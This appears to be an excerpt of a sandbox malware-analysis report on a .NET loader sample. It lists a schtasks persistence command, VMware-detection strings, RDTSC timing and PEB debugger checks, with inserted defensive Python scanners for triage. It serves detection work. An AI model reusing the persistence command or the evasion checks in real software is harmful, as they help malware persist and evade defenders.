Source: 8.0.iuvRyl9i7D.exe.2f0000.2.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.0.iuvRyl9i7D.exe.2f0000.3.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.0.iuvRyl9i7D.exe.2f0000.0.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.iuvRyl9i7D.exe.590000.9.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.iuvRyl9i7D.exe.590000.2.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.iuvRyl9i7D.exe.590000.0.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.2.iuvRyl9i7D.exe.590000.1.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.iuvRyl9i7D.exe.590000.1.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.iuvRyl9i7D.exe.590000.5.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: iuvRyl9i7D.exe, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: dDqpEdJEtzi.exe.0.dr, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 0.0.iuvRyl9i7D.exe.960000.0.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 0.2.iuvRyl9i7D.exe.960000.0.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 8.2.iuvRyl9i7D.exe.2f0000.0.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 8.0.iuvRyl9i7D.exe.2f0000.1.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 8.0.iuvRyl9i7D.exe.2f0000.2.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 8.0.iuvRyl9i7D.exe.2f0000.3.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 8.0.iuvRyl9i7D.exe.2f0000.0.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 12.0.iuvRyl9i7D.exe.590000.9.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 12.0.iuvRyl9i7D.exe.590000.2.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 12.0.iuvRyl9i7D.exe.590000.0.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 12.2.iuvRyl9i7D.exe.590000.1.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 12.0.iuvRyl9i7D.exe.590000.1.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 12.0.iuvRyl9i7D.exe.590000.5.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_00409023 push esi; iretd 12_2_0040902F
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_00416B91 push edx; retf 12_2_00416B92
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_00417423 push es; retf 12_2_00417424
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041D672 push eax; ret 12_2_0041D678
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041D67B push eax; ret 12_2_0041D6E2
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041D625 push eax; ret 12_2_0041D678
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041D6DC push eax; ret 12_2_0041D6E2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0463D0D1 push ecx; ret 21_2_0463D0E4
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00609023 push esi; iretd 21_2_0060902F
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00616B91 push edx; retf 21_2_00616B92
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00617423 push es; retf 21_2_00617424
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0061D672 push eax; ret 21_2_0061D678
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0061D67B push eax; ret 21_2_0061D6E2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0061D625 push eax; ret 21_2_0061D678
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0061D6DC push eax; ret 21_2_0061D6E2
Source: initial sample Static PE information: section name: .text entropy: 7.63421102824
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe File created: C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe

Boot Survival

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp280F.tmp
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: 0.2.iuvRyl9i7D.exe.2e5276c.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.296276978.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: iuvRyl9i7D.exe PID: 4928, type: MEMORYSTR
Source: iuvRyl9i7D.exe, 00000000.00000002.296276978.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: iuvRyl9i7D.exe, 00000000.00000002.296276978.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe RDTSC instruction interceptor: First address: 0000000000408C04 second address: 0000000000408C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe RDTSC instruction interceptor: First address: 0000000000408F9E second address: 0000000000408FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 0000000000608C04 second address: 0000000000608C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 0000000000608F9E second address: 0000000000608FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe TID: 3608 Thread sleep time: -45733s >= -30000s
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe TID: 6208 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6788 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6740 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\control.exe TID: 6500 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_00408ED0 rdtsc 12_2_00408ED0
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7432
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1085
Source: C:\Windows\SysWOW64\control.exe API coverage: 9.2 %
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00611660 FindFirstFileW,FindNextFileW,FindClose, 21_2_00611660
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00611659 FindFirstFileW,FindNextFileW,FindClose, 21_2_00611659
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Thread delayed: delay time: 45733
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000012.00000000.343652210.00000000051AC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000012.00000000.329987427.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000012.00000000.306952519.0000000005EAB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000012.00000000.306066644.0000000005134000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000012.00000000.328239618.00000000051F3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000012.00000000.329987427.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
Source: iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000012.00000000.306066644.0000000005134000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000012.00000000.329987427.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00dRom0cY
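Two different things are mixed in the string hits above. The explorer.exe entries are PnP device-interface paths (the NECVMWar SATA CD-ROM, the VMware virtual disk) that Explorer typically holds on any VMware guest once it has enumerated devices; they describe the analysis host, not an action of the sample. The hits inside the memory of iuvRyl9i7D.exe itself (the VMware Tools registry key and install path, the VMware SVGA II adapter name) are the strings a VM check compares against, and those are the evidence of an anti-VM routine. The Python below is an added example for triaging such dumps; it is not part of this report or of the sandbox's tooling. It scans a memory blob for these artifacts in both ASCII and UTF-16LE (the form a .NET process, or any Unicode Windows code, stores them in), reports offset and encoding per hit and tallies hits per indicator. SAMPLE_DUMP is constructed for the example; the indicator list is taken from the strings in this report and can be extended with the VirtualBox, QEMU and Hyper-V equivalents.

```python
from __future__ import annotations
from dataclasses import dataclass

# VM artifacts taken from the memory strings in this report. They are matched
# case-insensitively in both ASCII and UTF-16LE, because Windows processes hold
# registry paths and PnP device IDs mostly as wide strings.
VM_INDICATORS = {
    "vmware_tools_regkey": b"SOFTWARE\\VMware, Inc.\\VMware Tools",
    "vmware_tools_path":   b"\\VMWARE\\VMWARE TOOLS\\",
    "vmware_svga":         b"VMware SVGA II",
    "vmware_scsi_disk":    b"Ven_VMware&Prod_Virtual_disk",
    "vmware_sata_cdrom":   b"Ven_NECVMWar&Prod_VMware_SATA_CD00",
}


@dataclass(frozen=True)
class Hit:
    name: str
    offset: int      # byte offset into the scanned blob
    encoding: str    # "ascii" or "utf-16le"


def _find_all(hay: bytes, needle: bytes):
    """Yield every (possibly overlapping) offset of needle in hay."""
    start = 0
    while (i := hay.find(needle, start)) >= 0:
        yield i
        start = i + 1


def scan_vm_strings(blob: bytes) -> list[Hit]:
    """Return every VM-artifact hit in blob, sorted by offset."""
    # bytes.lower() only touches ASCII letters, so offsets stay exact and the
    # NUL high bytes of UTF-16LE text are preserved.
    hay = blob.lower()
    hits: list[Hit] = []
    for name, needle in VM_INDICATORS.items():
        ascii_needle = needle.lower()
        wide_needle = ascii_needle.decode("ascii").encode("utf-16-le")
        for enc, nd in (("ascii", ascii_needle), ("utf-16le", wide_needle)):
            hits.extend(Hit(name, off, enc) for off in _find_all(hay, nd))
    return sorted(hits, key=lambda h: (h.offset, h.name))


def summarize(hits: list[Hit]) -> dict[str, int]:
    """Indicator name -> number of hits, for a quick per-process tally."""
    counts: dict[str, int] = {}
    for h in hits:
        counts[h.name] = counts.get(h.name, 0) + 1
    return counts


# Constructed stand-in for a process memory dump (not bytes from the real
# sample): wide strings as a .NET heap would hold them, plus two narrow ones.
SAMPLE_DUMP = (
    b"\x00" * 16
    + "InstallPath".encode("utf-16-le")
    + "C:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS\\".encode("utf-16-le")
    + b"\x00" * 8
    + b"VMware SVGA II\x00"
    + b"\x00" * 8
    + "SOFTWARE\\VMware, Inc.\\VMware Tools".encode("utf-16-le")
    + b"\x00" * 8
    + b"SCSI\\Disk&Ven_VMware&Prod_Virtual_disk\\5&1ec51bf7&0&000000\x00"
)

if __name__ == "__main__":
    found = scan_vm_strings(SAMPLE_DUMP)
    for h in found:
        print(f"{h.offset:#08x} {h.encoding:<8} {h.name}")
    print(summarize(found))
```

Run it over a dump of the sample's own process and over a dump of explorer.exe from the same run: the same indicator names will appear in both, and only the tally inside the sample's process says anything about the sample.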
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_00408ED0 rdtsc 12_2_00408ED0
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process token adjusted: Debug Jump to behavior
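The entries around this point belong to two anti-analysis techniques. The rdtsc at 12_2_00408ED0 is the sample timing itself: under a hypervisor, instructions such as CPUID cause a VM exit, so the cycle delta between two RDTSC reads comes out far larger than on bare metal. The long run of "mov eax, dword ptr fs:[00000030h]" lines that follows is, in a 32-bit (WOW64) process, the load of the PEB pointer from the TEB; it is the first step of the PEB.BeingDebugged, PEB.NtGlobalFlag and PEB.Ldr checks, and the report prints one line per read, which is why the same function address (21_2_045F3D34, 21_2_046A1C06 and others) recurs a dozen times. Legitimate code reads the PEB too (the loader, the CRT, IsDebuggerPresent), so a single read means nothing; the signal is the density of reads across many functions in one region, which is what this list shows. The Python below is an added example, not part of this report or of the sandbox's static engine: a byte-pattern scanner that finds these instruction encodings in a code region, attributes each hit to caller-supplied function starts and prints the result in the report's own notation with a count instead of one repeated line per read. The code bytes, base address and function starts are constructed for the example.

```python
from __future__ import annotations
from bisect import bisect_right
from collections import Counter

# Encodings of the instructions flagged in the report. 0x64 is the FS segment
# prefix; A1 / 8B 05 load eax from an absolute 32-bit offset, 8B 0D loads ecx,
# 8B 15 loads edx. In a 32-bit process fs:[30h] is the PEB pointer and
# fs:[18h] the TEB self-pointer, the other route to the PEB.
PATTERNS = {
    "mov eax, dword ptr fs:[00000030h]": (b"\x64\xa1\x30\x00\x00\x00",
                                          b"\x64\x8b\x05\x30\x00\x00\x00"),
    "mov ecx, dword ptr fs:[00000030h]": (b"\x64\x8b\x0d\x30\x00\x00\x00",),
    "mov edx, dword ptr fs:[00000030h]": (b"\x64\x8b\x15\x30\x00\x00\x00",),
    "mov eax, dword ptr fs:[00000018h]": (b"\x64\xa1\x18\x00\x00\x00",),
    "rdtsc":                             (b"\x0f\x31",),
    "cpuid":                             (b"\x0f\xa2",),
}


def find_hits(code: bytes, base: int) -> list[tuple[int, str]]:
    """(virtual address, mnemonic) for every pattern occurrence, sorted by VA.
    Pure byte matching, no disassembly: a 0F 31 inside an immediate or a data
    blob is reported too, so treat results as leads, not proof."""
    hits: list[tuple[int, str]] = []
    for mnemonic, encodings in PATTERNS.items():
        for enc in encodings:
            start = 0
            while (i := code.find(enc, start)) >= 0:
                hits.append((base + i, mnemonic))
                start = i + 1
    return sorted(hits)


def group_by_function(hits: list[tuple[int, str]],
                      func_starts: list[int]) -> dict[int, Counter]:
    """Attribute each hit to the closest preceding function start, the way the
    report keys its entries by function address. Hits that lie before the
    first function start are dropped."""
    starts = sorted(func_starts)
    per_func: dict[int, Counter] = {}
    for va, mnemonic in hits:
        idx = bisect_right(starts, va) - 1
        if idx >= 0:
            per_func.setdefault(starts[idx], Counter())[mnemonic] += 1
    return per_func


def format_report(per_func: dict[int, Counter], tag: str = "21_2") -> list[str]:
    """One line per (function, instruction) in the report's notation."""
    lines = []
    for start in sorted(per_func):
        for mnemonic, n in sorted(per_func[start].items()):
            lines.append(f"Code function: {tag}_{start:08X} {mnemonic} x{n}")
    return lines


# Constructed 32-bit code, not bytes from the sample. Function A reads
# PEB.BeingDebugged, PEB.NtGlobalFlag and PEB.Ldr; function B times a CPUID
# (which exits to the hypervisor) between two RDTSC reads.
FUNC_A = (
    b"\x55"                          # push ebp
    b"\x8b\xec"                      # mov ebp, esp
    b"\x64\xa1\x30\x00\x00\x00"      # mov eax, fs:[30h]        ; PEB
    b"\x0f\xb6\x40\x02"              # movzx eax, byte [eax+2]  ; BeingDebugged
    b"\x85\xc0"                      # test eax, eax
    b"\x75\x10"                      # jnz short +16
    b"\x64\x8b\x0d\x30\x00\x00\x00"  # mov ecx, fs:[30h]        ; PEB
    b"\x8b\x49\x68"                  # mov ecx, [ecx+68h]       ; NtGlobalFlag
    b"\xf6\xc1\x70"                  # test cl, 70h             ; heap debug flags
    b"\x64\xa1\x30\x00\x00\x00"      # mov eax, fs:[30h]        ; PEB
    b"\x8b\x40\x0c"                  # mov eax, [eax+0Ch]       ; PEB.Ldr
    b"\x5d"                          # pop ebp
    b"\xc3"                          # ret
)
FUNC_B = (
    b"\x0f\x31"                      # rdtsc
    b"\x8b\xd8"                      # mov ebx, eax
    b"\x33\xc0"                      # xor eax, eax
    b"\x0f\xa2"                      # cpuid
    b"\x0f\x31"                      # rdtsc
    b"\x2b\xc3"                      # sub eax, ebx
    b"\x3d\xe8\x03\x00\x00"          # cmp eax, 3E8h            ; cycle threshold
    b"\xc3"                          # ret
)
BASE = 0x045F3D00
FUNC_STARTS = [0x045F3D00, 0x045F3D30]
# int3 padding so that FUNC_B starts exactly at 045F3D30.
SAMPLE_CODE = FUNC_A + b"\xcc" * (0x30 - len(FUNC_A)) + FUNC_B

if __name__ == "__main__":
    for line in format_report(group_by_function(find_hits(SAMPLE_CODE, BASE),
                                                FUNC_STARTS)):
        print(line)
```

For a real dump, feed the executable region and its base from the process memory dump and the function starts from a disassembler's function list; without a function list, grouping by page (va & ~0xFFF) still shows where the reads cluster.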
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460746D mov eax, dword ptr fs:[00000030h] 21_2_0460746D
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h] 21_2_0461AC7B (11 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461A44B mov eax, dword ptr fs:[00000030h] 21_2_0461A44B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0467C450 mov eax, dword ptr fs:[00000030h] 21_2_0467C450 (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461BC2C mov eax, dword ptr fs:[00000030h] 21_2_0461BC2C
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B740D mov eax, dword ptr fs:[00000030h] 21_2_046B740D (3 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h] 21_2_046A1C06 (14 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04666C0A mov eax, dword ptr fs:[00000030h] 21_2_04666C0A (4 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A14FB mov eax, dword ptr fs:[00000030h] 21_2_046A14FB
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04666CF0 mov eax, dword ptr fs:[00000030h] 21_2_04666CF0 (3 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B8CD6 mov eax, dword ptr fs:[00000030h] 21_2_046B8CD6
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F849B mov eax, dword ptr fs:[00000030h] 21_2_045F849B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460C577 mov eax, dword ptr fs:[00000030h] 21_2_0460C577 (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04623D43 mov eax, dword ptr fs:[00000030h] 21_2_04623D43
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04663540 mov eax, dword ptr fs:[00000030h] 21_2_04663540
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04693D40 mov eax, dword ptr fs:[00000030h] 21_2_04693D40
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04607D50 mov eax, dword ptr fs:[00000030h] 21_2_04607D50
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0466A537 mov eax, dword ptr fs:[00000030h] 21_2_0466A537
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046AE539 mov eax, dword ptr fs:[00000030h] 21_2_046AE539
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04614D3B mov eax, dword ptr fs:[00000030h] 21_2_04614D3B (3 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B8D34 mov eax, dword ptr fs:[00000030h] 21_2_046B8D34
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h] 21_2_045F3D34 (13 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EAD30 mov eax, dword ptr fs:[00000030h] 21_2_045EAD30
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046AFDE2 mov eax, dword ptr fs:[00000030h] 21_2_046AFDE2 (4 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04698DF1 mov eax, dword ptr fs:[00000030h] 21_2_04698DF1
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04666DC9 mov eax, dword ptr fs:[00000030h] 21_2_04666DC9 (5 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04666DC9 mov ecx, dword ptr fs:[00000030h] 21_2_04666DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045FD5E0 mov eax, dword ptr fs:[00000030h] 21_2_045FD5E0 (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046135A1 mov eax, dword ptr fs:[00000030h] 21_2_046135A1
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B05AC mov eax, dword ptr fs:[00000030h] 21_2_046B05AC (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E2D8A mov eax, dword ptr fs:[00000030h] 21_2_045E2D8A (5 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04611DB5 mov eax, dword ptr fs:[00000030h] 21_2_04611DB5 (3 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04612581 mov eax, dword ptr fs:[00000030h] 21_2_04612581 (4 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461FD9B mov eax, dword ptr fs:[00000030h] 21_2_0461FD9B (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460AE73 mov eax, dword ptr fs:[00000030h] 21_2_0460AE73 (5 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F7E41 mov eax, dword ptr fs:[00000030h] 21_2_045F7E41 (6 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046AAE44 mov eax, dword ptr fs:[00000030h] 21_2_046AAE44 (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F766D mov eax, dword ptr fs:[00000030h] 21_2_045F766D
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0469FE3F mov eax, dword ptr fs:[00000030h] 21_2_0469FE3F
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EC600 mov eax, dword ptr fs:[00000030h] 21_2_045EC600 (3 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04618E00 mov eax, dword ptr fs:[00000030h] 21_2_04618E00
